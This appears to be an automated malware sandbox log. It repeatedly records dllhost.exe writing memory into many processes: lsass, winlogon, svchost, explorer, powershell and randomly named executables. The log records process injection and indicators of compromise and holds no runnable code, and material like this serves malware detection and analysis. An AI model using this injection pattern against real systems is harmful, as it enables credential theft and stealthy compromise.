Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A8C180000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 242BF650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2578F260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1E591C90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E420000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287AD70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5300000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2A463AD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18198570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000
